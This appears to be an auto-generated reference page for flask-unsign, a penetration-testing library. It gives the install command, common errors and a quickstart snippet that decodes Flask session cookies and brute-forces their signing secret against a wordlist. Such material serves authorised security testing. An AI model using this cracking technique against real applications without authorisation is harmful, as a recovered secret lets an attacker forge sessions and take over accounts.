Flask Unsign
raw JSON → 1.2.1 verified Sat May 09 auth: no python
Penetration testing tool to decode and brute-force Flask session cookies by testing against a wordlist of common secret keys. Current version: 1.2.1. Release cadence is irregular, with the last release in 2022.
pip install flask-unsign Common errors
error AttributeError: module 'flask_unsign' has no attribute 'decode' ↓
cause User tried to call flask_unsign.decode() directly instead of using the UnsignSession class.
fix
Use 'from flask_unsign import UnsignSession' then create an instance: unsign = UnsignSession(); unsign.decode(cookie)
error TypeError: unsign() missing 1 required positional argument: 'wordlist' ↓
cause The unsign method requires a wordlist argument; it does not default to an internal list.
fix
Provide a list of candidate secret keys: result = unsign.unsign(cookie, wordlist=['secret1', 'secret2'])
Warnings
gotcha UnsignSession.unsign() expects a wordlist as a list of strings. Passing a file path will fail silently. ↓
fix Read the wordlist file into a list before passing: wordlist = [line.strip() for line in open('wordlist.txt')]
gotcha The tool does not support custom HTTP headers or proxies; it only extracts the session cookie string. ↓
fix Use requests or another library to fetch cookies, then pass the cookie value to flask-unsign.
deprecated The command-line interface (flask-unsign --decode) is still available but not actively maintained. The Python API is preferred. ↓
fix Use the Python API with UnsignSession class.
Imports
- UnsignSession
from flask_unsign import UnsignSession
Quickstart
from flask_unsign import UnsignSession
# Decode a session cookie (no secret needed)
cookie = 'eyJ1c2VyIjoiYWRtaW4ifQ.XYZ...'
unsign = UnsignSession()
print(unsign.decode(cookie))
# Brute-force secret key using a wordlist
wordlist = ['secret', 'key', 'password']
result = unsign.unsign(cookie, wordlist=wordlist)
print(f"Secret found: {result}" if result else "Not found")